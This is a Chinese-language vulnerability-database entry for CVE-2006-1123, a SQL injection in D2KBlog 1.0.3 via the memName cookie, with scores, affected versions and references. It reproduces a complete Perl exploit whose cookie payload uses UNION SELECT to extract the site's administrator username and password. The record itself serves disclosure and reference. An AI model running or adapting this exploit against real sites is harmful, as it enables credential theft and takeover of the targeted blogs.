CVE-2006-1123
CVSS10.0
发布时间 :2006-03-09 16:02:00
修订时间 :2011-03-07 21:32:06
NMCOE    

[原文]SQL injection vulnerability in D2KBlog 1.0.3 and earlier allows remote attackers to execute arbitrary SQL commands via the memName parameter in a cookie.


[CNNVD]D2KBlog多个SQL注入漏洞(CNNVD-200603-139)

        D2KBlog 1.0.3及其早期版本中存在SQL注入漏洞,远程攻击者可以通过memName参数来执行任意SQL指令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:d2ksoft:d2kblog:1.0.1
cpe:/a:d2ksoft:d2kblog:1.0
cpe:/a:d2ksoft:d2kblog:1.0.2
cpe:/a:d2ksoft:d2kblog:1.0.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1123
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1123
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-139
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/0896
(UNKNOWN)  VUPEN  ADV-2006-0896
http://www.securityfocus.com/archive/1/archive/1/427103/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060308 [KAPDA::#32] - d2kBlog 1.0.3 Multiple Vulnerabilities
http://secunia.com/advisories/19177
(VENDOR_ADVISORY)  SECUNIA  19177
http://xforce.iss.net/xforce/xfdb/25215
(UNKNOWN)  XF  d2kblog-memname-sql-injection(25215)
http://www.securityfocus.com/bid/17035
(UNKNOWN)  BID  17035
http://www.osvdb.org/23770
(UNKNOWN)  OSVDB  23770
http://securityreason.com/securityalert/559
(UNKNOWN)  SREASON  559

- 漏洞信息

D2KBlog多个SQL注入漏洞
危急 SQL注入
2006-03-09 00:00:00 2006-03-10 00:00:00
远程  
        D2KBlog 1.0.3及其早期版本中存在SQL注入漏洞,远程攻击者可以通过memName参数来执行任意SQL指令。

- 公告与补丁

        暂无数据

- 漏洞信息 (1569)

d2kBlog 1.0.3 (memName) Remote SQL Injection Exploit (EDBID:1569)
asp webapps
2006-03-09 Verified
0 DevilBox
N/A [点击下载]
#!/usr/bin/perl -w 
 # D2KBLOG SQL injection 
 # Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
 # Exploited by : devil_box [ devil_box [at} kapda.ir ]
 # member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)

require LWP::UserAgent;
require HTTP::Request;
print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
print "	KAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
print "	PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
print "	Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
print "\r\n=-=-=-==================================================================-=-=-=\r\n";

 if (@ARGV != 2) 
 { 
    print "	Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n"; 
    print "	ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
    exit (); 
 } 


my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,);

my $Path = $ARGV[0];

my $Page = $ARGV[1];

my $URL = "http://".$Path.$Page;

print "|***| Connecting to ".$URL." ...\r\n";

$r = HTTP::Request->new(GET => $URL."?action=edit");

$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" );

$res = $ua->request($r);

print "|***| Connected !\r\n";

if ($res->is_success) {

	print "|***| Extracting Username and Password ...\r\n\r\n";

	my $results = $res->content; 

	while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; }

	print "\r\n	Exploit by Devil_Box\r\n		Discovery by Farhad koosha\r\n\r\n";

 } else {
	die "\r\n|***| ".$res->status_line;
 }

# milw0rm.com [2006-03-09]
		

- 漏洞信息

23770
D2KBlog profile.asp Cookie memName Field SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

D2KBlog contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'profile.asp' script not properly sanitizing user-supplied input from the 'memName' cookie field. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2006-03-08 2006-01-01
2006-03-08 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站